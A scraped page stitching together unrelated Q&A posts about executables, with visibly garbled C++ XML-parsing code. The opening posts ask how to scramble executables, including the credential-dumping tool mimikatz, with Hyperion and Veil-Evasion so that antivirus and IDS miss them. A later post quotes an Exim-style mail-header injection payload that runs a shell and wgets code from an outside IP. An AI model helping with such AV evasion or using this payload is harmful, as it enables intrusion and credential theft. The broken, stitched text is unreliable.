Executable scrambling with Hyperion is detected. What can I do?

I am using Hyperion v2.1 to scramble (polymorphism) some .exe file:

hyperion.exe myexefile.exe scrambled.exe 

The resulting scrambled.exe file is detected and deleted by the AV or IDS system.

As far as I know, Hyperion performs some polymorphics changes, so generally it should work and be able to dodge AV defenses.

What can I do? Maybe increasing some parameters at Hyperion’s config? Scrambling twice, or with another scrambler like PEScrambler?

How can I obfuscate a 64-bit executable Windows file?

Hyperion work OK when scrambling/obfuscating win32 files, but I am trying a program that seems to be a Win64 executable, and it fails:

C:\Hyperion>hyperion.exe -v mimikatz.exe output.exe   ------------------------------- | Stage 1: Analyzing input file |  -------------------------------  Opening mimikatz.exe Copied file to memory location: 0x5a0020 Found valid MZ signature Found pointer to PE Header: 0x118 Found valid PE signature Error: File is PE64, aborting...  https://github.com/Veil-Framework/Veil-Evasion/tree/master/tools/hyperion https://github.com/Veil-Framework/Veil-Evasion/archive/hyperion.zip https://github.com/Veil-Framework/Veil-Evasion/archive/Veil-Evasion.zip https://github.com/Veil-Framework/hyperion/archive/hyperion.zip 

How can I obfuscate 64-bit executables?

I don’t mind to use Linux or Windows for the job.

Create an executable application in Ubuntu with many dependencies?

We have coded an application with many dependencies. Right now, we can use a makefile to compile source code. What we want to do next is create an executable application (we don’t want to release our source code) with the dependencies. Just a compressed file, other users can extract and use it directly. we don’t want to provide source code, it seems that debmake can’t work. How to compress the dependencies along with the executable main application? Thanks for any suggestions.

Error: The clangbackend executable

2019-08-29T08:24:45 Clang Code Model: Error: The clangbackend executable “C:\Qt\Qt5.11.2\Tools\QtCreator\bin\clangbackend.exe” could not be started (timeout after 10000ms).

include “Xml.h”

include

Xml::Xml() { } QVariant Xml::domparser(QString str){

// qDebug()<<” domparser str :::: “< result,finalResult; QDomDocument document; QString errorStr; int errorLine; int errorColumn;

if(!document.setContent(str,false,&errorStr, &errorLine, &errorColumn)){ 

// qDebug()<<“errorStr ::”<

QDomElement rootElement = document.firstChildElement(); 

// qDebug()<<“root:: “<

QVariant Xml::parseDomNode(QDomNode PNode) { QVariantMap tempMap; while(!PNode.isNull()) { QDomElement element = PNode.toElement(); // try to convert the node to an element.

    if(!element.isNull()) {         QDomNodeList list = PNode.childNodes();         if(list.count()<=1)         {             QDomElement tempElement = list.at(0).toElement();             if(!tempElement.isNull()){                 tempMap[element.tagName()] = QVariant::fromValue(formatDuplicateKeys(parseDomNode(list.at(0)).toMap()));             }else{                 if(tempMap.value(element.tagName()).isValid()){                     QVariantList listDetails;                     QString tagName = element.tagName();                     if(tempMap.value(tagName).type() == QVariant::List){                         listDetails = tempMap.value(tagName).toList();                     }else{                         listDetails.append(tempMap.value(tagName));                     }                      QVariantMap attrMap;                     bool isElementHasAttr = parseXmlAttributesifContains(element,attrMap);                     if(isElementHasAttr){                         attrMap[XML_TAG_VALUE] = QVariant::fromValue(element.text());                         listDetails.append(QVariant::fromValue(attrMap));                     }else{                         listDetails.append(QVariant::fromValue(element.text()));                     }                     tempMap[element.tagName()] = QVariant::fromValue(listDetails);                 }else{                     QVariantMap attrMap;                     bool isElementHasAttr = parseXmlAttributesifContains(element,attrMap);                     if(isElementHasAttr){                         attrMap[XML_TAG_VALUE] = QVariant::fromValue(element.text());                         tempMap[element.tagName()] = attrMap;                     }else{                         tempMap[element.tagName()] = QVariant::fromValue(element.text());                     }                 }             }         }         else         {             tempMap.insertMulti(element.tagName(),QVariant::fromValue(formatDuplicateKeys(parseDomNode(list.at(0)).toMap())));         }     }     PNode = PNode.nextSibling(); } return QVariant::fromValue(tempMap); 

}

bool Xml::parseXmlAttributesifContains(QDomElement attributeElemnt,QVariantMap& attrMap){ if(attributeElemnt.hasAttributes()){ QDomNamedNodeMap namedNodeMap = attributeElemnt.attributes(); // qDebug()<<“attributesCount : “<

QVariantMap Xml::formatDuplicateKeys( QVariantMap result ) { QVariantMap finalResult; QVariantList tempList; QStringList uniqueKeys,allKeys,dupKeys; uniqueKeys = result.uniqueKeys(); allKeys = result.keys(); for(int i=0;i1&& dupKeys.count(allKeys.at(i))<1) dupKeys<

} for(int j=0;j<dupKeys.size();j++) {     tempList<<result.values(dupKeys.at(j));     finalResult[dupKeys.at(j)] = tempList;     tempList.clear(); } return finalResult; 

}

QVariantMap Xml::jsonParsing(const QString jsonStr){ QJsonParseError *parseError = new QJsonParseError(); QJsonDocument document = QJsonDocument::fromJson(jsonStr.toLatin1(),parseError); QVariantMap returnMap; if(parseError->error == QJsonParseError::NoError){ returnMap = document.toVariant().toMap(); }else{ // qDebug()<<“Error Occurred While jsonParsing : “<errorString(); } return returnMap; }

//AADHAR CARD DATA PARSING PURPOSE FUNCTION QVariant Xml::parseXMLData(QString data,QString tag,QStringList exceptTags) { QMap person; QVariant parsedVar; QXmlStreamReader xml(data); QVariantList varList; while(!xml.atEnd()&& !xml.hasError()) { QXmlStreamReader::TokenType token = xml.readNext(); // qDebug()<<“ele start “<

                 if(xml.name() == tag) { //if same as given tag                      xml.readNext();                      if(!xml.isCharacters()) {                          continue;                      }                      else if(xml.isCharacters()) {//for single element                          varmap[tempName] = xml.text().toString();                      }                  } 

// qDebug()<<“tag ::before “<

                     while(xml.readNextStartElement())                      { 

// qDebug()<<“reading inner data “<

 if(varList.isEmpty())  { 

// qDebug()<<“VarList XML “;//<1) { parsedVar = QVariant::fromValue(varList); // qDebug()<<“VarList XML “<1) { parsedVar = QVariant::fromValue(varList.at(0)); // qDebug()<<“VarList XML map “<=1){ parsedVar = QVariant::fromValue(varList.at(0).toMap().value(varList.at(0).toMap().keys().at(0))); // qDebug()<<“VarList XML string”<

systemctl Service that runs an executable that never returns

I’m having some trouble figuring out how the services work on CentOS. Right now I have the following service file:

[Unit] Description=SelfTester After=network.target  [Service] Type=simple ExecStart=/usr/bin/selftester  [Install] WantedBy=multi-user.target 

This will launch a script that calls an executable that will never return:

#!/bin/bash export LD_LIBRARY_PATH=SOMEPATH && cd SOMEOTHERPATH && ./EXECUTABLE 

The executable never returns. When I launch the service, it runs for a while but then exits due to timeout:

Job for selftester.service failed because a timeout was exceeded. See "systemctl status selftester.service" and "journalctl -xe" for details. 

Thanks inadvance

How to authenticate with a user’s Gitlab username and password through a bash executable

So this is in addendum to my question posed here. Thank you to @dessert who helped a lot with that question.

So I am trying to authenticate a Gitlab user by using their username and password, and not by creating an impersonation token. At the moment, the code that @dessert has created that uses an impersonation token to authenticate a user is as such:

$   curl -d '{"title":"test key","key":"'"$  (cat ~/.ssh/id_rsa.pub)"'"}' -H 'Content-Type: application/json' https://gitlab.com/api/v4/user/keys?private_token=<my_access_token> 

Mainly focusing on the `private_token=, except with the creation of an impersonation token found here

$   curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" --data "name=mytoken" --data "expires_at=2017-04-04" --data "scopes[]=api" https://gitlab.example.com/api/v4/users/42/impersonation_tokens 

I want to be able to use the username and password of the Gitlab user to authenticate them. I’ve seen this done with Github, and have done it myself:

$   curl -u "USERNAME:PASSWORD" --data "{\"title\": \"TITLE\", \"key\": \"$  (cat ~/.ssh/id_rsa.pub)\"}" https://api.github.com/user/keys 

Where USERNAME and PASSWORD are authenticating by user-inputted username and password.

I don’t need help with reading input of the user; that’s not the issue. My issue (to sum up) is to be able to authenticate a Gitlab user through their username and password.

Again, thanks to @dessert for the help, and any other assistance is appreciated!!

A quick edit: I found this forum post for authentication with login and password, and most are saying to use a Personal Access Token. Does this mean I have to get the user to give me their PAT for authentication? Or do I provide my PAT and somehow it does something? (I was a little unclear on this)

Executable Code in Mail Headers [duplicate]

This question already has an answer here:

  • Unusual mail headers show evidence of MTA attack. Have I been pwned? 1 answer

Recently I noticed someone delivering email to my server root account with headers like this:

X-Original-To: root+$ {run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f45.79.163.30×22}}@host.example.com

I’ve never seen or heard of mail header injection. Can someone please identify what type of attack this is and which environments may be vulnerable to it?

Is there anyway to create an executable backup of a folder?

I have to create an executable to restore a workspace back to a certain stage (offline so files need to be stored with the executable). I know the shell commands I’d require but I’m not sure how to package this all into a nice executable with the files?

what I am requiring is:

  • delete existing folder if exists
  • copy files to this location
  • catkin_make (it’s a ROS workspace)
  • reboot

Essentially I have to make an idiot-proof way to restore the software to a version with just a double click.

Thanks if anyone can assist me 🙂